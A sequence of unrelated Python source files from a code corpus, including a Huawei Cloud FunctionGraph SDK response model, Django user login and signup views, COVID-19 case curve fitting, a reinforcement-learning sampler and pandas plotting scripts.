self._memory_size\n\n @memory_size.setter\n def memory_size(self, memory_size):\n \"\"\"Sets the memory_size of this ImportFunctionResponse.\n\n 函数消耗的内存。 单位M。 取值范围为:128、256、512、768、1024、1280、1536、1792、2048、2560、3072、3584、4096。 最小值为128,最大值为4096。\n\n :param memory_size: The memory_size of this ImportFunctionResponse.\n :type memory_size: int\n \"\"\"\n self._memory_size = memory_size\n\n @property\n def gpu_memory(self):\n \"\"\"Gets the gpu_memory of this ImportFunctionResponse.\n\n 函数消耗的显存,只支持自定义运行时与自定义镜像函数配置GPU。 单位MB。 取值范围为:1024、2048、3072、4096、5120、6144、7168、8192、9216、10240、11264、12288、13312、14336、15360、16384。 最小值为1024,最大值为16384。\n\n :return: The gpu_memory of this ImportFunctionResponse.\n :rtype: int\n \"\"\"\n return self._gpu_memory\n\n @gpu_memory.setter\n def gpu_memory(self, gpu_memory):\n \"\"\"Sets the gpu_memory of this ImportFunctionResponse.\n\n 函数消耗的显存,只支持自定义运行时与自定义镜像函数配置GPU。 单位MB。 取值范围为:1024、2048、3072、4096、5120、6144、7168、8192、9216、10240、11264、12288、13312、14336、15360、16384。 最小值为1024,最大值为16384。\n\n :param gpu_memory: The gpu_memory of this ImportFunctionResponse.\n :type gpu_memory: int\n \"\"\"\n self._gpu_memory = gpu_memory\n\n @property\n def cpu(self):\n \"\"\"Gets the cpu of this ImportFunctionResponse.\n\n 函数占用的cpu资源。 单位为millicore(1 core=1000 millicores)。 取值与MemorySize成比例,默认是128M内存占0.1个核(100 millicores)。 函数占用的CPU为基础CPU:200 millicores,再加上内存按比例占用的CPU,计算方法:内存/128 *100 + 200。\n\n :return: The cpu of this ImportFunctionResponse.\n :rtype: int\n \"\"\"\n return 
self._cpu\n\n @cpu.setter\n def cpu(self, cpu):\n \"\"\"Sets the cpu of this ImportFunctionResponse.\n\n 函数占用的cpu资源。 单位为millicore(1 core=1000 millicores)。 取值与MemorySize成比例,默认是128M内存占0.1个核(100 millicores)。 函数占用的CPU为基础CPU:200 millicores,再加上内存按比例占用的CPU,计算方法:内存/128 *100 + 200。\n\n :param cpu: The cpu of this ImportFunctionResponse.\n :type cpu: int\n \"\"\"\n self._cpu = cpu\n\n @property\n def code_type(self):\n \"\"\"Gets the code_type of this ImportFunctionResponse.\n\n 函数代码类型,取值有4种。 inline: UI在线编辑代码。 zip: 函数代码为zip包。 obs: 函数代码来源于obs存储。 jar: 函数代码为jar包,主要针对Java函数。\n\n :return: The code_type of this ImportFunctionResponse.\n :rtype: str\n \"\"\"\n return self._code_type\n\n @code_type.setter\n def code_type(self, code_type):\n \"\"\"Sets the code_type of this ImportFunctionResponse.\n\n 函数代码类型,取值有4种。 inline: UI在线编辑代码。 zip: 函数代码为zip包。 obs: 函数代码来源于obs存储。 jar: 函数代码为jar包,主要针对Java函数。\n\n :param code_type: The code_type of this ImportFunctionResponse.\n :type code_type: str\n \"\"\"\n self._code_type = code_type\n\n @property\n def code_url(self):\n \"\"\"Gets the code_url of this ImportFunctionResponse.\n\n 当CodeType为obs时,该值为函数代码包在OBS上的地址,CodeType为其他值时,该字段为空。\n\n :return: The code_url of this ImportFunctionResponse.\n :rtype: str\n \"\"\"\n return self._code_url\n\n @code_url.setter\n def code_url(self, code_url):\n \"\"\"Sets the code_url of this ImportFunctionResponse.\n\n 当CodeType为obs时,该值为函数代码包在OBS上的地址,CodeType为其他值时,该字段为空。\n\n :param code_url: The code_url of this ImportFunctionResponse.\n :type code_url: str\n \"\"\"\n self._code_url = code_url\n\n @property\n def code_filename(self):\n \"\"\"Gets the code_filename of this ImportFunctionResponse.\n\n 函数的文件名,当CodeType为jar/zip时必须提供该字段,inline和obs不需要提供。\n\n :return: The code_filename of this ImportFunctionResponse.\n :rtype: str\n \"\"\"\n return self._code_filename\n\n @code_filename.setter\n def code_filename(self, code_filename):\n \"\"\"Sets the code_filename of this ImportFunctionResponse.\n\n 函数的文件名,当CodeType为jar/zip时必须提供该字段,inline和obs不需要提供。\n\n :param code_filename: The code_filename of this ImportFunctionResponse.\n :type code_filename: str\n \"\"\"\n self._code_filename = code_filename\n\n @property\n def code_size(self):\n \"\"\"Gets the code_size of this ImportFunctionResponse.\n\n 函数大小,单位:字节。\n\n :return: The code_size of this ImportFunctionResponse.\n :rtype: int\n \"\"\"\n return self._code_size\n\n @code_size.setter\n def code_size(self, code_size):\n \"\"\"Sets the code_size of this ImportFunctionResponse.\n\n 函数大小,单位:字节。\n\n :param code_size: The code_size of this ImportFunctionResponse.\n :type code_size: int\n \"\"\"\n self._code_size = code_size\n\n @property\n def user_data(self):\n \"\"\"Gets the user_data of this ImportFunctionResponse.\n\n 用户自定义的name/value信息。 在函数中使用的参数。 举例:如函数要访问某个主机,可以设置自定义参数:Host={host_ip},最多定义20个,总长度不超过4KB。\n\n :return: The user_data of this ImportFunctionResponse.\n :rtype: str\n \"\"\"\n return self._user_data\n\n @user_data.setter\n def user_data(self, user_data):\n \"\"\"Sets the user_data of this ImportFunctionResponse.\n\n 用户自定义的name/value信息。 在函数中使用的参数。 举例:如函数要访问某个主机,可以设置自定义参数:Host={host_ip},最多定义20个,总长度不超过4KB。\n\n :param user_data: The user_data of this ImportFunctionResponse.\n :type user_data: str\n \"\"\"\n self._user_data = user_data\n\n @property\n def digest(self):\n \"\"\"Gets the digest of this ImportFunctionResponse.\n\n 函数代码SHA512 hash值,用于判断函数是否变化。\n\n :return: The digest of this ImportFunctionResponse.\n :rtype: str\n \"\"\"\n return self._digest\n\n @digest.setter\n def digest(self, 
digest):\n \"\"\"Sets the digest of this ImportFunctionResponse.\n\n 函数代码SHA512 hash值,用于判断函数是否变化。\n\n :param digest: The digest of this ImportFunctionResponse.\n :type digest: str\n \"\"\"\n self._digest = digest\n\n @property\n def version(self):\n \"\"\"Gets the version of this ImportFunctionResponse.\n\n 函数版本号,由系统自动生成,规则:vYYYYMMDD-HHMMSS(v+年月日-时分秒)。\n\n :return: The version of this ImportFunctionResponse.\n :rtype: str\n \"\"\"\n return self._version\n\n @version.setter\n def version(self, version):\n \"\"\"Sets the version of this ImportFunctionResponse.\n\n 函数版本号,由系统自动生成,规则:vYYYYMMDD-HHMMSS(v+年月日-时分秒)。\n\n :param version: The version of this ImportFunctionResponse.\n :type version: str\n \"\"\"\n self._version = version\n\n @property\n def image_name(self):\n \"\"\"Gets the image_name of this ImportFunctionResponse.\n\n 函数版本的内部标识。\n\n :return: The image_name of this ImportFunctionResponse.\n :rtype: str\n \"\"\"\n return self._image_name\n\n @image_name.setter\n def image_name(self, image_name):\n \"\"\"Sets the image_name of this ImportFunctionResponse.\n\n 函数版本的内部标识。\n\n :param image_name: The image_name of this ImportFunctionResponse.\n :type image_name: str\n \"\"\"\n self._image_name = image_name\n\n @property\n def xrole(self):\n \"\"\"Gets the xrole of this ImportFunctionResponse.\n\n 函数使用的权限委托名称,需要IAM支持,并在IAM界面创建委托,当函数需要访问其他服务时,必须提供该字段。\n\n :return: The xrole of this ImportFunctionResponse.\n :rtype: str\n \"\"\"\n return self._xrole\n\n @xrole.setter\n def xrole(self, xrole):\n \"\"\"Sets the xrole of this ImportFunctionResponse.\n\n 函数使用的权限委托名称,需要IAM支持,并在IAM界面创建委托,当函数需要访问其他服务时,必须提供该字段。\n\n :param xrole: The xrole of this ImportFunctionResponse.\n :type xrole: str\n \"\"\"\n self._xrole = xrole\n\n @property\n def app_xrole(self):\n \"\"\"Gets the app_xrole of this ImportFunctionResponse.\n\n 函数app使用的权限委托名称,需要IAM支持,并在IAM界面创建委托,当函数需要访问其他服务时,必须提供该字段。\n\n :return: The app_xrole of this ImportFunctionResponse.\n :rtype: str\n \"\"\"\n return self._app_xrole\n\n @app_xrole.setter\n def app_xrole(self, app_xrole):\n \"\"\"Sets the app_xrole of this ImportFunctionResponse.\n\n 函数app使用的权限委托名称,需要IAM支持,并在IAM界面创建委托,当函数需要访问其他服务时,必须提供该字段。\n\n :param app_xrole: The app_xrole of this ImportFunctionResponse.\n :type app_xrole: str\n \"\"\"\n self._app_xrole = app_xrole\n\n @property\n def description(self):\n \"\"\"Gets the description of this ImportFunctionResponse.\n\n 函数描述。\n\n :return: The description of this ImportFunctionResponse.\n :rtype: str\n \"\"\"\n return self._description\n\n @description.setter\n def description(self, description):\n \"\"\"Sets the description of this ImportFunctionResponse.\n\n 函数描述。\n\n :param description: The description of this ImportFunctionResponse.\n :type description: str\n \"\"\"\n self._description = description\n\n @property\n def version_description(self):\n \"\"\"Gets the version_description of this ImportFunctionResponse.\n\n 函数版本描述。\n\n :return: The version_description of this ImportFunctionResponse.\n :rtype: str\n \"\"\"\n return self._version_description\n\n @version_description.setter\n def version_description(self, version_description):\n \"\"\"Sets the version_description of this ImportFunctionResponse.\n\n 函数版本描述。\n\n :param version_description: The version_description of this ImportFunctionResponse.\n :type version_description: str\n \"\"\"\n self._version_description = version_description\n\n @property\n def last_modified(self):\n \"\"\"Gets the last_modified of this ImportFunctionResponse.\n\n 函数最后一次更新时间。\n\n :return: The last_modified 
of this ImportFunctionResponse.\n :rtype: datetime\n \"\"\"\n return self._last_modified\n\n @last_modified.setter\n def last_modified(self, last_modified):\n \"\"\"Sets the last_modified of this ImportFunctionResponse.\n\n 函数最后一次更新时间。\n\n :param last_modified: The last_modified of this ImportFunctionResponse.\n :type last_modified: datetime\n \"\"\"\n self._last_modified = last_modified\n\n @property\n def func_vpc(self):\n \"\"\"Gets the func_vpc of this ImportFunctionResponse.\n\n :return: The func_vpc of this ImportFunctionResponse.\n :rtype: :class:`huaweicloudsdkfunctiongraph.v2.FuncVpc`\n \"\"\"\n return self._func_vpc\n\n @func_vpc.setter\n def func_vpc(self, func_vpc):\n \"\"\"Sets the func_vpc of this ImportFunctionResponse.\n\n :param func_vpc: The func_vpc of this ImportFunctionResponse.\n :type func_vpc: :class:`huaweicloudsdkfunctiongraph.v2.FuncVpc`\n \"\"\"\n self._func_vpc = func_vpc\n\n @property\n def depend_list(self):\n \"\"\"Gets the depend_list of this ImportFunctionResponse.\n\n 依赖id列表\n\n :return: The depend_list of this ImportFunctionResponse.\n :rtype: list[str]\n \"\"\"\n return self._depend_list\n\n @depend_list.setter\n def depend_list(self, depend_list):\n \"\"\"Sets the depend_list of this ImportFunctionResponse.\n\n 依赖id列表\n\n :param depend_list: The depend_list of this ImportFunctionResponse.\n :type depend_list: list[str]\n \"\"\"\n self._depend_list = depend_list\n\n @property\n def depend_version_list(self):\n \"\"\"Gets the depend_version_list of this ImportFunctionResponse.\n\n 依赖版本id列表\n\n :return: The depend_version_list of this ImportFunctionResponse.\n :rtype: list[str]\n \"\"\"\n return self._depend_version_list\n\n @depend_version_list.setter\n def depend_version_list(self, depend_version_list):\n \"\"\"Sets the depend_version_list of this ImportFunctionResponse.\n\n 依赖版本id列表\n\n :param depend_version_list: The depend_version_list of this ImportFunctionResponse.\n :type depend_version_list: list[str]\n \"\"\"\n self._depend_version_list = depend_version_list\n\n @property\n def strategy_config(self):\n \"\"\"Gets the strategy_config of this ImportFunctionResponse.\n\n :return: The strategy_config of this ImportFunctionResponse.\n :rtype: :class:`huaweicloudsdkfunctiongraph.v2.StrategyConfig`\n \"\"\"\n return self._strategy_config\n\n @strategy_config.setter\n def strategy_config(self, strategy_config):\n \"\"\"Sets the strategy_config of this ImportFunctionResponse.\n\n :param strategy_config: The strategy_config of this ImportFunctionResponse.\n :type strategy_config: :class:`huaweicloudsdkfunctiongraph.v2.StrategyConfig`\n \"\"\"\n self._strategy_config = strategy_config\n\n @property\n def extend_config(self):\n \"\"\"Gets the extend_config of this ImportFunctionResponse.\n\n 函数扩展配置。\n\n :return: The extend_config of this ImportFunctionResponse.\n :rtype: str\n \"\"\"\n return self._extend_config\n\n @extend_config.setter\n def extend_config(self, extend_config):\n \"\"\"Sets the extend_config of this ImportFunctionResponse.\n\n 函数扩展配置。\n\n :param extend_config: The extend_config of this ImportFunctionResponse.\n :type extend_config: str\n \"\"\"\n self._extend_config = extend_config\n\n @property\n def initializer_handler(self):\n \"\"\"Gets the initializer_handler of this ImportFunctionResponse.\n\n 函数初始化入口,规则:xx.xx,必须包含“. 
”。 举例:对于node.js函数:myfunction.initializer,则表示函数的文件名为myfunction.js,初始化的入口函数名为initializer。\n\n :return: The initializer_handler of this ImportFunctionResponse.\n :rtype: str\n \"\"\"\n return self._initializer_handler\n\n @initializer_handler.setter\n def initializer_handler(self, initializer_handler):\n \"\"\"Sets the initializer_handler of this ImportFunctionResponse.\n\n 函数初始化入口,规则:xx.xx,必须包含“. ”。 举例:对于node.js函数:myfunction.initializer,则表示函数的文件名为myfunction.js,初始化的入口函数名为initializer。\n\n :param initializer_handler: The initializer_handler of this ImportFunctionResponse.\n :type initializer_handler: str\n \"\"\"\n self._initializer_handler = initializer_handler\n\n @property\n def initializer_timeout(self):\n \"\"\"Gets the initializer_timeout of this ImportFunctionResponse.\n\n 初始化超时时间,超时函数将被强行停止,范围1~300秒。\n\n :return: The initializer_timeout of this ImportFunctionResponse.\n :rtype: int\n \"\"\"\n return self._initializer_timeout\n\n @initializer_timeout.setter\n def initializer_timeout(self, initializer_timeout):\n \"\"\"Sets the initializer_timeout of this ImportFunctionResponse.\n\n 初始化超时时间,超时函数将被强行停止,范围1~300秒。\n\n :param initializer_timeout: The initializer_timeout of this ImportFunctionResponse.\n :type initializer_timeout: int\n \"\"\"\n self._initializer_timeout = initializer_timeout\n\n @property\n def enterprise_project_id(self):\n \"\"\"Gets the enterprise_project_id of this ImportFunctionResponse.\n\n 企业项目ID,在企业用户创建函数时必填。\n\n :return: The enterprise_project_id of this ImportFunctionResponse.\n :rtype: str\n \"\"\"\n return self._enterprise_project_id\n\n @enterprise_project_id.setter\n def enterprise_project_id(self, enterprise_project_id):\n \"\"\"Sets the enterprise_project_id of this ImportFunctionResponse.\n\n 企业项目ID,在企业用户创建函数时必填。\n\n :param enterprise_project_id: The enterprise_project_id of this ImportFunctionResponse.\n :type enterprise_project_id: str\n \"\"\"\n self._enterprise_project_id = enterprise_project_id\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.openapi_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n if attr in self.sensitive_list:\n result[attr] = \"****\"\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n import simplejson as json\n if six.PY2:\n import sys\n reload(sys)\n sys.setdefaultencoding(\"utf-8\")\n return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)\n\n def __repr__(self):\n \"\"\"For `print`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, ImportFunctionResponse):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n","sub_path":"huaweicloud-sdk-functiongraph/huaweicloudsdkfunctiongraph/v2/model/import_function_response.py","file_name":"import_function_response.py","file_ext":"py","file_size_in_byte":39811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} 
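A minimal usage sketch of the generated-SDK pattern in the record above: each field is stored on an underscored attribute behind a property pair, and to_dict() walks openapi_types to serialize the instance, recursing into nested models. The sketch assumes the class is imported from the record's module; the argument values are made up for illustration.

    # Hypothetical illustration of the property/to_dict pattern in
    # ImportFunctionResponse above; "demo" and 256 are made-up values.
    resp = ImportFunctionResponse(func_name="demo", memory_size=256)
    assert resp.func_name == "demo"        # property proxies self._func_name
    payload = resp.to_dict()               # keys follow openapi_types attrs
    print(payload["func_name"], payload["memory_size"])  # -> demo 256

The six.PY2 branch in to_str() suggests the explicit property boilerplate is kept for Python 2 compatibility, which is likely why the model sticks to properties rather than dataclasses.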
+{"seq_id":"149600094","text":"import pandas as pd\nfrom pandas.plotting import register_matplotlib_converters\nregister_matplotlib_converters()\nimport warnings\nimport numpy as np\nimport matplotlib.pylab as plt\nfrom scipy.optimize import curve_fit\nwarnings.filterwarnings(\"ignore\")\n\n\nnazionale_df = pd.read_csv(\"dpc-covid19-ita-andamento-nazionale.csv\",parse_dates=['data'],\n index_col=['data'])\n\nprint(nazionale_df.head(5))\nprint(nazionale_df.columns)\ntotale_casi = np.array(nazionale_df['totale_casi'])\ncasi_attivi = totale_casi - nazionale_df['dimessi_guariti']\n\ndata = nazionale_df.index.values\n# convert date to unix time for fit use\ndates = pd.to_numeric(data)\n\n# totale_casi_fit = np.polyfit(dates, np.log(totale_casi), 1)\n\n\n\ndef func(x, a, b, c): # Hill sigmoidal equation from zunzun.com\n return a * np.power(x, b) / (np.power(c, b) + np.power(x, b))\n\ndef func1(x, a, b, c): # Hill sigmoidal equation from zunzun.com\n return a * np.power(x, b) / (np.power(c, b) + np.power(x, b))\n\ndef func2(x, a, b,c,d):\n return d + ((a-d)/(1+(x/c)**b))\n\ndef exp_func(x, a, b ):\n return a*np.exp(b*x)\ndef log_func(t,a,b):\n return a+b*np.log(t)\n\n# using an array of integer to calculate fit to avoid overflow\nx = np.arange(0,len(totale_casi))\n\npopt1, pcov1 = curve_fit(exp_func, x, totale_casi)\npopt2, pcov2 = curve_fit(exp_func, x, casi_attivi)\n\n\n\n# plt.figure()\n# plt.plot(x, totale_casi, 'ko', label=\"Original Data\")\n# plt.plot(x, exp_func(x, *popt1), 'r-', label=\"Fitted Curve\")\n#\n#\n# plt.legend()\n# plt.show()\n\nplt.figure()\nplt.plot(nazionale_df.index.values,nazionale_df['totale_casi'],'k',label='totale casi',marker='x')\nplt.plot(nazionale_df.index.values,casi_attivi,'b',label='casi attivi')\nplt.plot(nazionale_df.index.values, exp_func(x, *popt1), 'r-', label=\"Fitted Curve - casi totali\")\nplt.plot(nazionale_df.index.values, exp_func(x, *popt2), 'm-', label=\"Fitted Curve - casi attivi\")\n\nplt.plot(nazionale_df.index.values,nazionale_df['isolamento_domiciliare'],label='isolamento_domiciliare',marker='>')\nplt.plot(nazionale_df.index.values,nazionale_df['deceduti'],label='deceduti',marker='o')\nplt.plot(nazionale_df.index.values,nazionale_df['dimessi_guariti'],label='dimessi_guariti',marker='s')\n# plt.plot(date, totale_casi_fit,label='casi totali - fit', marker='^')\nplt.xticks(rotation=15, ha=\"right\")\nplt.legend(loc='best')\n\n# plt.show()\n# print(popt,pcov)\n\n\n\nx = np.arange(0, len(totale_casi))\n\ntry:\n fittedParameters, pcov = curve_fit(func1, x, totale_casi, maxfev=5000)\n modelPredictions = func1(x, *fittedParameters)\n\n absError = modelPredictions - totale_casi\n\n SE = np.square(absError) # squared errors\n MSE = np.mean(SE) # mean squared errors\n RMSE = np.sqrt(MSE) # Root Mean Squared Error, RMSE\n Rsquared = 1.0 - (np.var(absError) / np.var(totale_casi))\n\n print('Parameters:', fittedParameters)\n print('RMSE:', RMSE)\n print('R-squared:', Rsquared)\n # create data for the fitted equation plot\n xModel = np.linspace(min(x), max(x))\n yModel = func1(xModel, *fittedParameters)\n\n # first the raw data as a scatter plot\n plt.figure()\n length = len(totale_casi)\n plt.plot(x, totale_casi, 'ko', label=\"Original Data\")\n # plt.plot(nazionale_df.index.values, totale_casi, label=\"Original Data - \" + country + ' - ' + label)\n # plt.figure()\n # now the model as a line plot\n plt.plot(xModel, yModel, label=\"Fitted Curve - casi totali\")\n\n plt.xticks(rotation=15, ha=\"right\")\n # plt.xticks(dates)\n # 
plt.major_formatter(mdates.DateFormatter(\"%m-%d\"))\n # plt.minor_formatter(mdates.DateFormatter(\"%m-%d\"))\n plt.legend(loc='best')\n\n plt.show()\nexcept ValueError:\n print('failed to fit data') # this script configures no logger, so report the failure via print\n\n\n","sub_path":"dati-andamento-nazionale/dati_nazionali.py","file_name":"dati_nazionali.py","file_ext":"py","file_size_in_byte":3711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"390871855","text":"# -*- coding: utf-8 -*-\nfrom blog.models import Blog\nfrom django.core.urlresolvers import reverse\nfrom django.contrib.auth.models import User\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth import logout as django_logout, authenticate, login as django_login\nfrom users.forms import LoginForm, SignupForm\nfrom django.views.generic import View\n\n\nclass LoginView(View):\n\n def get(self, request):\n error_messages = []\n form = LoginForm()\n context = {\n 'errors': error_messages,\n 'login_form': form\n }\n return render(request, 'users/login.html', context)\n\n def post(self, request):\n error_messages = []\n form = LoginForm(request.POST)\n if form.is_valid():\n username = form.cleaned_data.get('usr')\n password = form.cleaned_data.get('pwd')\n user = authenticate(username=username, password=password)\n if user is None:\n error_messages.append('Nombre de usuario o contraseña incorrectos')\n else:\n if user.is_active:\n django_login(request, user)\n url = request.GET.get('next',\n 'post_home') # if there is no 'next' GET parameter, send the user to 'post_home'\n return redirect(url)\n else:\n error_messages.append('El usuario no está activo')\n context = {\n 'errors': error_messages,\n 'login_form': form\n }\n return render(request, 'users/login.html', context)\n\n\nclass LogoutView(View):\n\n def get(self, request):\n if request.user.is_authenticated():\n django_logout(request)\n return redirect('post_home')\n\n\nclass SignupView(View):\n\n def get(self, request):\n \"\"\"\n Shows a form for creating a user\n :param request: HttpRequest\n :return: HttpResponse\n \"\"\"\n form = SignupForm()\n context = {\n 'form': form,\n 'success_message': ''\n }\n return render(request, 'users/new_user.html', context)\n\n def post(self, request):\n \"\"\"\n Creates a user from the POST data\n :param request: HttpRequest\n :return: HttpResponse\n \"\"\"\n success_message = ''\n\n form = SignupForm(request.POST)\n if form.is_valid():\n user = User()\n user.username = form.cleaned_data.get('usr')\n user.first_name = form.cleaned_data.get('first_name')\n user.last_name = form.cleaned_data.get('last_name')\n user.email = form.cleaned_data.get('email')\n user.set_password(form.cleaned_data.get('password'))\n user.save()\n\n blog = Blog()\n blog.title = \"My first blog\"\n blog.owner = user\n blog.save()\n\n success_message = 'Creado con éxito!'\n # NOTE: the anchor markup in this record was stripped during extraction;\n # the '<a href=...>' / '</a>' literals below are a best-guess reconstruction\n success_message += '<a href=\"{0}\">'.format(\n reverse('post_home', args=[])\n )\n success_message += 'go Home!'\n success_message += '</a>'\n context = {\n 'form': form,\n 'success_message': success_message\n }\n return render(request, 'users/new_user.html', context)\n","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"599028735","text":"from django import forms\nfrom . import models\n\n\nclass CreateMedia(forms.ModelForm):\n class Meta:\n model = models.Media\n fields = [\n 'title',\n 'photo',\n 'slug',\n 'Left',\n 'Top',\n 'Right',\n 'Bottom',\n 'Resize_Width',\n 'Resize_Height',\n 'Rotate_Degree',\n 'Black_White',\n 'Share'\n ]\n\n\n","sub_path":"photo/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"312846783","text":"import sys\nimport statistics\n\ndef monitor(line: str) -> str:\n tokens = line.split()\n name = []\n if tokens[0].isalpha():\n while tokens[0].isalpha():\n name.append(tokens.pop(0))\n else:\n while tokens[-1].isalpha():\n name.insert(0, tokens.pop())\n\n avg_heartrate = statistics.mean(list(map(float, tokens)))\n\n # format with :f (six decimal places) so the output matches the expected string in test_1\n return f\"{avg_heartrate:f} {' '.join(name)}\"\n\ndef test_1():\n assert monitor('Lisa Marie Presley 90.2 104.3 110.1 118.7 122.3') == '109.120000 Lisa Marie Presley'\n\nif __name__ == '__main__':\n for line in sys.stdin:\n print(monitor(line))\n\n# from 396.0 rank 946 to 397.7 rank 941\n","sub_path":"python/1_7/pervasiveheartmonitor.py","file_name":"pervasiveheartmonitor.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"527885161","text":"\n\nimport numpy as np\nimport tqdm\nimport mujoco_py\nimport cv2\n\n\n\nclass Sampler:\n\n def __init__(self, env, policy, max_steps=None):\n self.env = env\n self.policy = policy\n self.max_steps = max_steps\n self.returns = []\n self.total_steps = 0\n self.new_episode()\n\n def new_episode(self):\n self.policy.reset()\n self.last_ob = None\n self.current_return = 0.0\n self.current_step = 0\n\n @property\n def is_terminal(self):\n return self.last_ob is None\n\n def step(self, random=False):\n\n # Clear if done\n if self.last_ob is None:\n ob = self.env.reset()\n else:\n ob = self.last_ob\n\n # Get action and advance env\n if random:\n ac, policy_info = self.env.action_space.sample(), {}\n else:\n ac, policy_info = self.policy.get_action(ob)\n next_ob, rew, done, _ = self.env.step(ac)\n\n # Bookkeeping\n self.last_ob = next_ob\n self.current_return += rew\n self.current_step += 1\n self.total_steps += 1\n\n # Stop if done or max steps exceeded\n if done or self.max_steps and self.current_step >= self.max_steps:\n self.returns.append(self.current_return)\n self.new_episode()\n\n return dict(\n ob=ob, ac=ac, rew=rew, next_ob=next_ob, done=done, **policy_info\n )\n\n def sample_steps(self, n=None, random=False):\n data = []\n for _ in range(int(n or 1)):\n data.append(self.step(random=random))\n # If single step, convert list of dicts -> dict\n if not n:\n data = data[0]\n # Otherwise, convert list of dicts -> dicts of np.array\n else:\n data = {k: np.array([step[k] for step in data]) for k in data[0]}\n\n return data\n\n def sample_paths(self, n=None, random=False):\n paths = []\n for _ in range(int(n or 1)):\n # Reset and sample until terminal\n self.new_episode()\n data = []\n while True:\n data.append(self.step(random=random))\n if self.is_terminal:\n break\n # Convert list of dicts -> dicts of np.array\n path = {k: np.array([step[k] for step in data]) for k in data[0]}\n paths.append(path)\n # return the single path when n is None, otherwise the full list of paths\n return paths[0] if not n else paths\n\n def evaluate(\n self, n, random=False, render=False, render_max=None, render_size=None\n ):\n rews = []\n rets = []\n lens = []\n frames = []\n self.new_episode()\n for i in range(n):\n step = self.step(random=random)\n rews.append(step['rew'])\n if render and (render_max is None or i < render_max):\n frame = self.env.render(mode='rgb_array')\n if render_size is not None:\n frame = cv2.resize(frame, render_size)\n frames.append(frame)\n if self.is_terminal:\n rets.append(sum(rews))\n lens.append(len(rews))\n rews = []\n info = {}\n info['Return'] = rets\n info['TrajLen'] = lens\n frames = np.array(frames) if render else None\n return info, frames\n\n\nclass SkillSampler(Sampler):\n\n def __init__(\n self, env, policy, num_skills, skill_dist=None, max_steps=None\n ):\n self.num_skills = num_skills\n self.skill_dist = skill_dist\n super().__init__(env, policy, max_steps=max_steps)\n\n def new_episode(self):\n super().new_episode()\n # If distribution is given, sample it\n if self.skill_dist is not None:\n self.skill = self.skill_dist()\n # Otherwise, sample uniformly\n else:\n self.skill = np.random.randint(self.num_skills)\n\n def step(self, greedy=False, skill=None):\n # Clear if done\n if self.last_ob is None:\n ob = self.env.reset()\n else:\n ob = self.last_ob\n\n # Get action conditioned on current skill and advance env;\n # fall back to the episode skill only when skill is None, so that skill 0 stays usable\n skill = self.skill if skill is None else skill\n skill_1h = np.zeros(self.num_skills, dtype=np.float32)\n skill_1h[skill] = 1.0\n ac = self.policy.get_action(ob, skill_1h, greedy=greedy)\n next_ob, rew, done, info = self.env.step(ac)\n\n # Bookkeeping\n self.last_ob = next_ob\n self.current_return += rew\n self.current_step += 1\n self.total_steps += 1\n\n # Stop if done or max steps exceeded\n if done or self.max_steps and self.current_step >= self.max_steps:\n self.returns.append(self.current_return)\n self.new_episode()\n\n return dict(\n ob=ob, ac=ac, rew=rew, next_ob=next_ob, done=done, skill=skill\n )\n","sub_path":"project/samplers.py","file_name":"samplers.py","file_ext":"py","file_size_in_byte":4822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"358365640","text":"# coding:utf8\n\nimport numpy\nimport pandas\nimport matplotlib\nfrom matplotlib import pyplot as plt\n\nfont = {\n \"family\": \"SimHei\"\n}\nmatplotlib.rc(\"font\", **font)\n\ndata = pandas.read_csv(\n \"E:\\Workspace\\idata\\lab_data_analysis\\data\\lab38_01\\data.csv\"\n)\n\nresult = data.pivot_table(\n values=\"月消费(元)\",\n index=\"手机品牌\",\n columns=\"通信品牌\",\n aggfunc=numpy.sum\n)\n\nindex = numpy.arange(len(result))\n# three colours (same RGB, increasing alpha)\nminColor = (42 / 256, 87 / 256, 141 / 256, 1 / 3)\nmidColor = (42 / 256, 87 / 256, 141 / 256, 2 / 3)\nmaxColor = (42 / 256, 87 / 256, 141 / 256, 3 / 3)\n\n# lay the series out side by side to form a grouped bar chart, implemented with index and width offsets\nplt.bar(\n index, result[\"全球通\"],\n color=minColor, width=1 / 4\n)\nplt.bar(\n index + 1 / 4, result[\"动感地带\"],\n color=midColor, width=1 / 4\n)\nplt.bar(\n index + 2 / 4, result[\"神州行\"],\n color=maxColor, width=1 / 4\n)\nplt.xticks(index + 1 / 3, result.index)\nplt.legend([\"全球通\", \"动感地带\", \"神州行\"])\nplt.show()\n\n# refinement: sort the data before plotting\nresult2 = result.sort_values(\n by=\"神州行\", ascending=False\n)\nplt.bar(\n index, result2['神州行'],\n color=maxColor, width=1 / 4\n)\nplt.bar(\n index + 1 / 4, result2['动感地带'],\n color=midColor, width=1 / 4\n)\nplt.bar(\n index + 2 / 4, result2['全球通'],\n color=minColor, width=1 / 4\n)\nplt.xticks(index + 1 / 3, result2.index)\nplt.legend(['神州行', '动感地带', 